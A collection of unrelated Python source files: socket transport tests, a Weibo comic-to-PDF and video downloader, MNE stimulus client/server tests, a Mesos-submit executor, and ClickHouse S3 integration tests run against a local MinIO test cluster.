with TSocket.TSocket(host=addr[0], port=addr[1]) as conn:
conn.write(text)
self.assertFalse(conn.isOpen())
with server.accept() as client:
read = client.read(len(text))
self.assertFalse(conn.isOpen())
self.assertFalse(server.isListening())
self.assertEquals(read, text)
def test_server_context_errors(self):
# Make sure the TServerSocket context manager doesn't
# swallow exceptions
def do_test():
with TSocket.TServerSocket(port=0, family=socket.AF_INET6):
raise Exception('test_error')
self.assertRaisesRegexp(Exception, 'test_error', do_test)
def test_open_failure(self):
# Bind a server socket to an address, but don't actually listen on it.
server_socket = socket.socket(socket.AF_INET6)
try:
server_socket.bind(('::', 0))
server_port = server_socket.getsockname()[1]
# Explicitly use "localhost" as the hostname, so that the
# connect code will try both IPv6 and IPv4. We want to
# exercise the failure behavior when trying multiple addresses.
sock = TSocket.TSocket(host='localhost', port=server_port)
sock.setTimeout(50) # ms
try:
sock.open()
self.fail('unexpectedly succeeded to connect to closed socket')
except TTransport.TTransportException:
# sock.open() should not leave the file descriptor open
# when it fails
self.assertEquals(None, sock.handle)
self.assertEquals({}, sock.handles)
# Calling close() again on the socket should be a no-op,
# and shouldn't throw an error
sock.close()
finally:
server_socket.close()
def test_poller_process(self):
# Make sure that pollers do not fail when they're given None as timeout
text = "hi" # sample text to send over the wire
with TSocket.TServerSocket(port=0, family=socket.AF_INET6) as server:
addr = server.getSocketNames()[0]
def write_data():
# delay writing to verify that poller.process is waiting
time.sleep(1)
with TSocket.TSocket(host=addr[0], port=addr[1]) as conn:
conn.write(text)
poller = TSocket.ConnectionSelect()
thread = threading.Thread(target=write_data)
thread.start()
for filenos in server.handles.keys():
poller.read(filenos)
r, _, x = poller.process(timeout=None)
thread.join()
# Verify that r is non-empty
self.assertTrue(r)
def test_deprecated_str_form_of_port(self):
# Make sure that the deprecated form of the `port` parameter is
# accepted in TServerSocket and TSocket.
port = "0"
text = b"hi" # sample text to send over the wire
# NB: unfortunately unittest.TestCase.assertWarns isn't available until
# py3.
with TSocket.TServerSocket(port=port, family=socket.AF_INET6) as server:
addr = server.getSocketNames()[0]
with TSocket.TSocket(host=addr[0], port=str(addr[1])) as conn:
conn.write(text)
with server.accept() as client:
read = client.read(len(text))
self.assertEquals(read, text)
def test_bad_port(self):
port = 'bogus'
with self.assertRaises(ValueError):
with TSocket.TServerSocket(port=port):
pass
with self.assertRaises(ValueError):
with TSocket.TSocket(port=port):
pass
def test_unix_socket(self):
text = b"hi" # sample text to send over the wire
with tempfile.NamedTemporaryFile(delete=True) as fh:
unix_socket = fh.name
with TSocket.TServerSocket(unix_socket=unix_socket) as server:
with TSocket.TSocket(unix_socket=unix_socket) as conn:
conn.write(text)
with server.accept() as client:
read = client.read(len(text))
self.assertEquals(read, text)
# The socket will not be cleaned up when the server has been shutdown.
self.assertTrue(os.path.exists(unix_socket))
|
Comic2pdfAdv.py | import requests
from colorama import *
import time
import os
import fitz
import threading
import glob
from pyquery import PyQuery as pq
class Comic2PDF():
# 构造函数
def __init__(self):
self.path = "./download/"
self.file_name = ""
self.label = "谨以此软件献给永远的神作----龙珠"
# 获取当前时间戳,这个值无所谓,加上会更有爬虫的尊严。返回值:当前时间的时间戳long类型
def getmsTime(self):
t = time.time()
mst = int(round(t * 1000))
return mst
# 获取图片链接地址,批量获取微博头条文章下的所有图片的url链接。返回值:url链接图片列表
def generate_img_urls(self, id):
tm = self.getmsTime()
url = "https://card.weibo.com/article/m/aj/detail?id=%s&_t=%s" % (
id, str(tm))
refervalue = "https://card.weibo.com/article/m/show/id/%s" % id
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0".3809.100 Safari/537.36',
'Referer': refervalue}
response = requests.get(url, headers=headers)
text = response.json()
self.file_name = text['data']['title']
print("--------------------------------------")
print("漫画: " + text['data']['title'])
print("发布时间: " + text['data']['create_at'])
print("阅读量: " + text['data']['read_count'])
print("--------------------------------------")
img_url_all = text['data']['content']
pic_url = []
doc = pq(img_url_all)
lis = doc('p img').items()
for li in lis:
pic_url.append(li.attr('src'))
return pic_url
# 创建下载文件夹,建一个临时缓存文件夹用于储存下载图片的位置,最后会被删掉。返回值:文件夹的路径
def create_down_dir(self):
path = self.path
if not os.path.exists(path):
os.mkdir(path)
return path
# 下载图片,获得到图片的url链接后就可下载图片。返回值:文件夹的路径。
def download_imgs(self, img_urls):
path = self.create_down_dir()
count = 1
for strimg in img_urls:
response = requests.get(strimg)
with open(path + str(count).zfill(3) + strimg[-4:], 'wb') as file:
file.write(response.content)
print(Fore.GREEN + "已下载 " + strimg)
count += 1
return path
# 生成pdf文档,把下载的图片生成一个默认A4大小的PDF文档。PDF文件的路径是和软件的根路径一样的。
def generatePDF(self, imgpath):
doc = fitz.open()
for img in sorted(glob.glob(imgpath + "*")):
print(Fore.MAGENTA + "插入图片: " + img)
imgdoc = fitz.open(img)
pdfbytes = imgdoc.convertToPDF()
imgpdf = fitz.open("pdf", pdfbytes)
doc.insertPDF(imgpdf)
file_name = self.file_name
if file_name == "":
doc.save(str(self.getmsTime()) + ".pdf")
else:
doc.save(file_name + ".pdf")
self.file_name = ""
# 删除图片文件,只保留pdf。PDF生成成功了,还要缓存的干啥,删掉图片,顺便把缓存的文件夹也删掉。
def delete_imgs(self, imgpath):
imgs = glob.glob(imgpath + "*")
for img in imgs:
os.remove(img)
print(Fore.BLUE + "删除缓存 " + img)
os.removedirs(imgpath)
print("--------------------------------------")
# 最后不能忘记再写个作者,我 ^_^
def paint_author(self):
about = """\n作者: Elliot Lee \n反馈:lsldragon@ouotlook.com"""
print(Fore.BLACK + Back.WHITE + about)
print(Style.RESET_ALL)
# 从漫画id获取,即微博头条文章
def get_from_id(self):
print()
value = input(Fore.YELLOW + "输入漫画id(微博网页头条文章): ")
res = self.generate_img_urls(value)
path = self.download_imgs(res)
self.generatePDF(path)
self.delete_imgs(path)
print(Fore.RED + "生成pdf成功")
self.paint_author()
# 从长图的url链接获取,url可从浏览器直接复制,省去了解析链接的麻烦
def get_from_longimg_url(self):
print()
value = input(Fore.YELLOW + "输入长图的url链接: ")
# 因为download_imgs(value) 传入的value是一个列表,而输入的是一个字符串,所以要将字符转为列表
path = self.download_imgs([value])
self.generatePDF(path)
self.delete_imgs(path)
print(Fore.RED + "生成pdf成功")
self.paint_author()
# 启用进程下载
def down_videos(self, url):
print(Fore.GREEN + "正在下载.....")
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0".3809.100 Safari/537.36'}
response = requests.get(url, headers=headers)
video_name = str(self.getmsTime()) + ".mp4"
with open(video_name, 'wb') as f:
f.write(response.content)
def down_weibo_video(self):
print()
help = """获取视频真实地址操作方法:\n
1. 右键微博视频, 点击视频地址选项,此时会出现该视频的url. Ctrl + C 复制url
2. 将此url复制到浏览器的搜索框中, 回车. 即是该视频的播放页面
3. 以谷歌浏览器为例, 按F12, 此时出现浏览器抓包的界面,F5刷新页面
4. 点击网络(Network), 点击下方的媒体(Meida)
5. 此时浏览器已经抓到了视频资源,点击出现的选项
6. 在右侧的头文件(headers)中找到请求url(request url)
7. 复制request url 后的链接,即使该视频的真实地址
8. 将真实地址复制到该软件即可
"""
print(Fore.CYAN + help)
value = input(Fore.YELLOW + "输入微博视频的视频地址: ")
print("--------------------------------------")
print(Fore.GREEN + "正在解析.....\n")
p = threading.Thread(target=self.down_videos, args=(value,))
p.start()
p.join()
print()
time.sleep(1.5)
print(Fore.RED + "下载视频完成")
print(Fore.YELLOW + "--------------------------------------")
self.paint_author()
# 启动程序
def run(self):
print()
print(Fore.WHITE + Back.RED + self.label)
print(Style.RESET_ALL)
print()
options = """选择:
1. id,微博头条文章的图片转为PDF
2. 长图,微博的长图链接转换为PDF
3. 下载微博视频beta
-> """
while True:
try:
value = input(options)
if value == "1":
self.get_from_id()
elif value == "2":
self.get_from_longimg_url()
elif value == "3":
self.down_weibo_video()
else:
pass
except:
print(Fore.RED + "失败!可是我也不太清楚问题出在哪里,请重试")
print(Style.RESET_ALL)
if __name__ == "__main__":
c2f = Comic2PDF()
c2f.run()
print(Style.RESET_ALL) |
test_stim_client_server.py | import threading
import time
from nose.tools import assert_equal, assert_raises, assert_true
from mne.realtime import StimServer, StimClient
from mne.externals.six.moves import queue
from mne.utils import requires_good_network, run_tests_if_main
_server = None
_have_put_in_trigger = False
_max_wait = 10.
@requires_good_network
def test_connection():
"""Test TCP/IP connection for StimServer <-> StimClient.
"""
global _server, _have_put_in_trigger
# have to start a thread to simulate the effect of two
# different computers since stim_server.start() is designed to
# be a blocking method
# use separate queues because timing matters
trig_queue1 = queue.Queue()
trig_queue2 = queue.Queue()
# start a thread to emulate 1st client
thread1 = threading.Thread(target=_connect_client, args=(trig_queue1,))
thread1.daemon = True
# start another thread to emulate 2nd client
thread2 = threading.Thread(target=_connect_client, args=(trig_queue2,))
thread2.daemon = True
thread1.start()
thread2.start()
with StimServer('localhost', port=4218, n_clients=2) as stim_server:
_server = stim_server
stim_server.start(timeout=10.0) # don't allow test to hang
# Add the trigger to the queue for both clients
stim_server.add_trigger(20)
_have_put_in_trigger = True # monkey patch
# the assert_equal must be in the test_connection() method
# Hence communication between threads is necessary
trig1 = trig_queue1.get(timeout=_max_wait)
trig2 = trig_queue2.get(timeout=_max_wait)
assert_equal(trig1, 20)
# test if both clients receive the same trigger
assert_equal(trig1, trig2)
# test timeout for stim_server
with StimServer('localhost', port=4218) as stim_server:
assert_raises(StopIteration, stim_server.start, 0.1)
def _connect_client(trig_queue):
"""Helper method that instantiates the StimClient.
"""
# just wait till the main thread reaches stim_server.start()
t0 = time.time()
while (time.time() - t0 < _max_wait and
(_server is None or not _server._running)):
time.sleep(0.01)
assert_true(_server is not None and _server._running)
# instantiate StimClient
stim_client = StimClient('localhost', port=4218)
# wait for script to reach stim_server.add_trigger()
t0 = time.time()
while (time.time() - t0 < _max_wait and not _have_put_in_trigger):
time.sleep(0.01)
assert_true(_have_put_in_trigger)
trig_queue.put(stim_client.get_trigger())
stim_client.close()
run_tests_if_main()
|
executor.py | #!/usr/bin/env python
import os
import pickle
import subprocess
import sys
import threading
import time
from threading import Thread
import mesos
# This function is called in its own thread to actually run the user's command.
# When it finishes, it shuts down the scheduler driver (disconnecting the
# framework) and exits the program.
def run_command(command, driver):
print "Running " + command
equal_signs = "=" * 40
print equal_signs
try:
code = os.system(command)
print equal_signs
print "Command completed with code %d" % code
except OSError,e:
print equal_signs
print "os.system call failed, see stderr for details"
print >>sys.stderr, "Error executing command"
print >>sys.stderr, e
driver.stop()
sys.exit(2)
driver.stop()
sys.exit(0)
# A secondary scheduler registered for our framework with Mesos so that
# our first scheduler (on the machine that ran mesos-submit) can disconnect.
# This scheduler launches no further tasks but allows our one task to continue
# running in the cluster -- the task essentially becomes its own scheduler.
class SecondaryScheduler(mesos.Scheduler):
def __init__(self, framework_name, command):
mesos.Scheduler.__init__(self)
self.framework_name = framework_name
self.command = command
def getFrameworkName(self, driver):
return self.framework_name
def getExecutorInfo(self, driver):
executorPath = os.path.join(os.getcwd(), "executor")
return mesos.ExecutorInfo(executorPath, "")
def resourceOffer(self, driver, oid, offers):
# Reject the offer with an infinite timeout, since we are here
# only to serve as a second scheduler to keep the framework running
driver.replyToOffer(oid, [], {"timeout": "-1"})
def registered(self, driver, fid):
print "Registered with Mesos; starting command"
Thread(target=run_command, args=[self.command, driver]).start()
def error(self, driver, code, message):
print "Error from Mesos: %s (code %s)" % (message, code)
# This function is called in a separate thread to run our secondary scheduler;
# for some reason, things fail if we launch it from the executor's launchTask
# callback (this is likely to be SWIG/Python related).
def run_scheduler(fid, framework_name, master, command):
print "Starting secondary scheduler"
sched = SecondaryScheduler(framework_name, command)
sched_driver = mesos.MesosSchedulerDriver(sched, master, fid)
sched_driver.run()
# Executor class for mesos-submit. Expects to be given a single task
# to launch with a framework ID, master URL and command as parameters.
# Once this task is received, the executor registers as a scheduler for the
# framework by creating a SecondaryScheduler object, allowing the mesos-submit
# command on the user's machine to exit, and it starts the user's command
# on this cluster node as a subprocess.
class MyExecutor(mesos.Executor):
def __init__(self):
mesos.Executor.__init__(self)
self.sched = None
def launchTask(self, driver, task):
if self.sched == None:
print "Received task; going to register as scheduler"
# Recover framework ID, master and command from task arg
fid, framework_name, master, command = pickle.loads(task.arg)
print "Mesos-submit parameters:"
print " framework ID = %s" % fid
print " framework name = %s" % framework_name
print " master = %s" % master
print " command = %s" % command
# Start our secondary scheduler in a different thread (for some reason,
# this fails if we do it from the same thread.. probably due to some
# SWIG Python interaction).
Thread(target=run_scheduler,
args=[fid, framework_name, master, command]).start()
else:
print "Error: received a second task -- this should never happen!"
def killTask(self, driver, tid):
sys.exit(1)
def error(self, driver, code, message):
print "Error from Mesos: %s (code %s)" % (message, code)
if __name__ == "__main__":
print "Starting mesos-submit executor"
executor = MyExecutor()
mesos.MesosExecutorDriver(executor).run()
|
test.py | import gzip
import json
import logging
import os
import io
import random
import threading
import time
import helpers.client
import pytest
from helpers.cluster import ClickHouseCluster, ClickHouseInstance, get_instances_dir
MINIO_INTERNAL_PORT = 9001
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
CONFIG_PATH = os.path.join(SCRIPT_DIR, './{}/dummy/configs/config.d/defaultS3.xml'.format(get_instances_dir()))
# Creates S3 bucket for tests and allows anonymous read-write access to it.
def prepare_s3_bucket(started_cluster):
# Allows read-write access for bucket without authorization.
bucket_read_write_policy = {"Version": "2012-10-17",
"Statement": [
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:GetBucketLocation",
"Resource": "arn:aws:s3:::root"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": "arn:aws:s3:::root"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::root/*"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:PutObject",
"Resource": "arn:aws:s3:::root/*"
}
]}
minio_client = started_cluster.minio_client
minio_client.set_bucket_policy(started_cluster.minio_bucket, json.dumps(bucket_read_write_policy))
started_cluster.minio_restricted_bucket = "{}-with-auth".format(started_cluster.minio_bucket)
if minio_client.bucket_exists(started_cluster.minio_restricted_bucket):
minio_client.remove_bucket(started_cluster.minio_restricted_bucket)
minio_client.make_bucket(started_cluster.minio_restricted_bucket)
def put_s3_file_content(started_cluster, bucket, filename, data):
buf = io.BytesIO(data)
started_cluster.minio_client.put_object(bucket, filename, buf, len(data))
# Returns content of given S3 file as string.
def get_s3_file_content(started_cluster, bucket, filename, decode=True):
# type: (ClickHouseCluster, str, str, bool) -> str
data = started_cluster.minio_client.get_object(bucket, filename)
data_str = b""
for chunk in data.stream():
data_str += chunk
if decode:
return data_str.decode()
return data_str
@pytest.fixture(scope="module")
def started_cluster():
try:
cluster = ClickHouseCluster(__file__)
cluster.add_instance("restricted_dummy", main_configs=["configs/config_for_test_remote_host_filter.xml"],
with_minio=True)
cluster.add_instance("dummy", with_minio=True, main_configs=["configs/defaultS3.xml"])
cluster.add_instance("s3_max_redirects", with_minio=True, main_configs=["configs/defaultS3.xml"],
user_configs=["configs/s3_max_redirects.xml"])
logging.info("Starting cluster...")
cluster.start()
logging.info("Cluster started")
prepare_s3_bucket(cluster)
logging.info("S3 bucket created")
run_s3_mocks(cluster)
yield cluster
finally:
cluster.shutdown()
def run_query(instance, query, stdin=None, settings=None):
# type: (ClickHouseInstance, str, object, dict) -> str
logging.info("Running query '{}'...".format(query))
result = instance.query(query, stdin=stdin, settings=settings)
logging.info("Query finished")
return result
# Test simple put. Also checks that wrong credentials produce an error with every compression method.
@pytest.mark.parametrize("maybe_auth,positive,compression", [
pytest.param("", True, 'auto', id="positive"),
pytest.param("'minio','minio123',", True, 'auto', id="auth_positive"),
pytest.param("'wrongid','wrongkey',", False, 'auto', id="auto"),
pytest.param("'wrongid','wrongkey',", False, 'gzip', id="gzip"),
pytest.param("'wrongid','wrongkey',", False, 'deflate', id="deflate"),
pytest.param("'wrongid','wrongkey',", False, 'brotli', id="brotli"),
pytest.param("'wrongid','wrongkey',", False, 'xz', id="xz"),
pytest.param("'wrongid','wrongkey',", False, 'zstd', id="zstd")
])
def test_put(started_cluster, maybe_auth, positive, compression):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket if not maybe_auth else started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 2, 3), (3, 2, 1), (78, 43, 45)"
values_csv = "1,2,3\n3,2,1\n78,43,45\n"
filename = "test.csv"
put_query = f"""insert into table function s3('http://{started_cluster.minio_ip}:{started_cluster.minio_port}/{bucket}/{filename}',
{maybe_auth}'CSV', '{table_format}', {compression}) values {values}"""
try:
run_query(instance, put_query)
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
assert values_csv == get_s3_file_content(started_cluster, bucket, filename)
@pytest.mark.parametrize("special", [
"space",
"plus"
])
def test_get_file_with_special(started_cluster, special):
symbol = {"space": " ", "plus": "+"}[special]
urlsafe_symbol = {"space": "%20", "plus": "%2B"}[special]
auth = "'minio','minio123',"
bucket = started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"]
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = [[12549, 2463, 19893], [64021, 38652, 66703], [81611, 39650, 83516], [11079, 59507, 61546], [51764, 69952, 6876], [41165, 90293, 29095], [40167, 78432, 48309], [81629, 81327, 11855], [55852, 21643, 98507], [6738, 54643, 41155]]
values_csv = ('\n'.join((','.join(map(str, row)) for row in values)) + '\n').encode()
filename = f"get_file_with_{special}_{symbol}two.csv"
put_s3_file_content(started_cluster, bucket, filename, values_csv)
get_query = f"SELECT * FROM s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/get_file_with_{special}_{urlsafe_symbol}two.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert [list(map(int, l.split())) for l in run_query(instance, get_query).splitlines()] == values
get_query = f"SELECT * FROM s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/get_file_with_{special}*.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert [list(map(int, l.split())) for l in run_query(instance, get_query).splitlines()] == values
get_query = f"SELECT * FROM s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/get_file_with_{special}_{urlsafe_symbol}*.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert [list(map(int, l.split())) for l in run_query(instance, get_query).splitlines()] == values
@pytest.mark.parametrize("special", [
"space",
"plus",
"plus2"
])
def test_get_path_with_special(started_cluster, special):
symbol = {"space": "%20", "plus": "%2B", "plus2": "%2B"}[special]
safe_symbol = {"space": "%20", "plus": "+", "plus2": "%2B"}[special]
auth = "'minio','minio123',"
table_format = "column1 String"
instance = started_cluster.instances["dummy"]
get_query = f"SELECT * FROM s3('http://resolver:8082/get-my-path/{safe_symbol}.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert run_query(instance, get_query).splitlines() == [f"/{symbol}.csv"]
# Test put no data to S3.
@pytest.mark.parametrize("auth", [
pytest.param("'minio','minio123',", id="minio")
])
def test_empty_put(started_cluster, auth):
# type: (ClickHouseCluster, str) -> None
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
create_empty_table_query = """
CREATE TABLE empty_table (
{}
) ENGINE = Null()
""".format(table_format)
run_query(instance, create_empty_table_query)
filename = "empty_put_test.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') select * from empty_table".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, auth, table_format)
run_query(instance, put_query)
try:
run_query(instance, "select count(*) from s3('http://{}:{}/{}/{}', {}'CSV', '{}')".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, auth, table_format))
assert False, "Query should be failed."
except helpers.client.QueryRuntimeException as e:
assert str(e).find("The specified key does not exist") != 0
# Test put values in CSV format.
@pytest.mark.parametrize("maybe_auth,positive", [
pytest.param("", True, id="positive"),
pytest.param("'minio','minio123',", True, id="auth_positive"),
pytest.param("'wrongid','wrongkey',", False, id="negative"),
])
def test_put_csv(started_cluster, maybe_auth, positive):
# type: (ClickHouseCluster, bool, str) -> None
bucket = started_cluster.minio_bucket if not maybe_auth else started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') format CSV".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, maybe_auth, table_format)
csv_data = "8,9,16\n11,18,13\n22,14,2\n"
try:
run_query(instance, put_query, stdin=csv_data)
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
assert csv_data == get_s3_file_content(started_cluster, bucket, filename)
# Test put and get with S3 server redirect.
def test_put_get_with_redirect(started_cluster):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
values_csv = "1,1,1\n1,1,1\n11,11,11\n"
filename = "test.csv"
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, table_format, values)
run_query(instance, query)
assert values_csv == get_s3_file_content(started_cluster, bucket, filename)
query = "select *, column1*column2*column3 from s3('http://{}:{}/{}/{}', 'CSV', '{}')".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, table_format)
stdout = run_query(instance, query)
assert list(map(str.split, stdout.splitlines())) == [
["1", "1", "1", "1"],
["1", "1", "1", "1"],
["11", "11", "11", "1331"],
]
# Test put with restricted S3 server redirect.
def test_put_with_zero_redirect(started_cluster):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["s3_max_redirects"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
filename = "test.csv"
# Should work without redirect
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, table_format, values)
run_query(instance, query)
# Should not work with redirect
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, table_format, values)
exception_raised = False
try:
run_query(instance, query)
except Exception as e:
assert str(e).find("Too many redirects while trying to access") != -1
exception_raised = True
finally:
assert exception_raised
def test_put_get_with_globs(started_cluster):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
max_path = ""
for i in range(10):
for j in range(10):
path = "{}_{}/{}.csv".format(i, random.choice(['a', 'b', 'c', 'd']), j)
max_path = max(path, max_path)
values = "({},{},{})".format(i, j, i + j)
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, path, table_format, values)
run_query(instance, query)
query = "select sum(column1), sum(column2), sum(column3), min(_file), max(_path) from s3('http://{}:{}/{}/*_{{a,b,c,d}}/%3f.csv', 'CSV', '{}')".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, table_format)
assert run_query(instance, query).splitlines() == [
"450\t450\t900\t0.csv\t{bucket}/{max_path}".format(bucket=bucket, max_path=max_path)]
# Test multipart put.
@pytest.mark.parametrize("maybe_auth,positive", [
pytest.param("", True, id="positive"),
pytest.param("'wrongid','wrongkey'", False, id="negative"),
# ("'minio','minio123',",True), Redirect with credentials not working with nginx.
])
def test_multipart_put(started_cluster, maybe_auth, positive):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket if not maybe_auth else started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
# Minimum size of part is 5 Mb for Minio.
# See: https://github.com/minio/minio/blob/master/docs/minio-limits.md
min_part_size_bytes = 5 * 1024 * 1024
csv_size_bytes = int(min_part_size_bytes * 1.5) # To have 2 parts.
one_line_length = 6 # 3 digits, 2 commas, 1 line separator.
# Generate data having size more than one part
int_data = [[1, 2, 3] for i in range(csv_size_bytes // one_line_length)]
csv_data = "".join(["{},{},{}\n".format(x, y, z) for x, y, z in int_data])
assert len(csv_data) > min_part_size_bytes
filename = "test_multipart.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') format CSV".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, maybe_auth, table_format)
try:
run_query(instance, put_query, stdin=csv_data, settings={'s3_min_upload_part_size': min_part_size_bytes,
's3_max_single_part_upload_size': 0})
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
# Use proxy access logs to count number of parts uploaded to Minio.
proxy_logs = started_cluster.get_container_logs("proxy1") # type: str
assert proxy_logs.count("PUT /{}/{}".format(bucket, filename)) >= 2
assert csv_data == get_s3_file_content(started_cluster, bucket, filename)
def test_remote_host_filter(started_cluster):
instance = started_cluster.instances["restricted_dummy"]
format = "column1 UInt32, column2 UInt32, column3 UInt32"
query = "select *, column1*column2*column3 from s3('http://{}:{}/{}/test.csv', 'CSV', '{}')".format(
"invalid_host", MINIO_INTERNAL_PORT, started_cluster.minio_bucket, format)
assert "not allowed in config.xml" in instance.query_and_get_error(query)
other_values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
query = "insert into table function s3('http://{}:{}/{}/test.csv', 'CSV', '{}') values {}".format(
"invalid_host", MINIO_INTERNAL_PORT, started_cluster.minio_bucket, format, other_values)
assert "not allowed in config.xml" in instance.query_and_get_error(query)
@pytest.mark.parametrize("s3_storage_args", [
pytest.param("''", id="1_argument"),
pytest.param("'','','','','',''", id="6_arguments"),
])
def test_wrong_s3_syntax(started_cluster, s3_storage_args):
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
expected_err_msg = "Code: 42" # NUMBER_OF_ARGUMENTS_DOESNT_MATCH
query = "create table test_table_s3_syntax (id UInt32) ENGINE = S3({})".format(s3_storage_args)
assert expected_err_msg in instance.query_and_get_error(query)
# https://en.wikipedia.org/wiki/One_Thousand_and_One_Nights
def test_s3_glob_scheherazade(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
max_path = ""
values = "(1, 1, 1)"
nights_per_job = 1001 // 30
jobs = []
for night in range(0, 1001, nights_per_job):
def add_tales(start, end):
for i in range(start, end):
path = "night_{}/tale.csv".format(i)
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, path, table_format, values)
run_query(instance, query)
jobs.append(threading.Thread(target=add_tales, args=(night, min(night + nights_per_job, 1001))))
jobs[-1].start()
for job in jobs:
job.join()
query = "select count(), sum(column1), sum(column2), sum(column3) from s3('http://{}:{}/{}/night_*/tale.csv', 'CSV', '{}')".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, table_format)
assert run_query(instance, query).splitlines() == ["1001\t1001\t1001\t1001"]
def run_s3_mocks(started_cluster):
logging.info("Starting s3 mocks")
mocks = (
("mock_s3.py", "resolver", "8080"),
("unstable_server.py", "resolver", "8081"),
("echo.py", "resolver", "8082"),
)
for mock_filename, container, port in mocks:
container_id = started_cluster.get_container_id(container)
current_dir = os.path.dirname(__file__)
started_cluster.copy_file_to_container(container_id, os.path.join(current_dir, "s3_mocks", mock_filename), mock_filename)
started_cluster.exec_in_container(container_id, ["python", mock_filename, port], detach=True)
# Wait for S3 mocks to start
for mock_filename, container, port in mocks:
num_attempts = 100
for attempt in range(num_attempts):
ping_response = started_cluster.exec_in_container(started_cluster.get_container_id(container),
["curl", "-s", f"http://localhost:{port}/"], nothrow=True)
if ping_response != 'OK':
if attempt == num_attempts - 1:
assert ping_response == 'OK', 'Expected "OK", but got "{}"'.format(ping_response)
else:
time.sleep(1)
else:
logging.debug(f"mock {mock_filename} ({port}) answered {ping_response} on attempt {attempt}")
break
logging.info("S3 mocks started")
def replace_config(old, new):
config = open(CONFIG_PATH, 'r')
config_lines = config.readlines()
config.close()
config_lines = [line.replace(old, new) for line in config_lines]
config = open(CONFIG_PATH, 'w')
config.writelines(config_lines)
config.close()
def test_custom_auth_headers(started_cluster):
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = "select * from s3('http://resolver:8080/{bucket}/{file}', 'CSV', '{table_format}')".format(
bucket=started_cluster.minio_restricted_bucket,
file=filename,
table_format=table_format)
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
result = run_query(instance, get_query)
assert result == '1\t2\t3\n'
instance.query(
"CREATE TABLE test ({table_format}) ENGINE = S3('http://resolver:8080/{bucket}/{file}', 'CSV')".format(
bucket=started_cluster.minio_restricted_bucket,
file=filename,
table_format=table_format
))
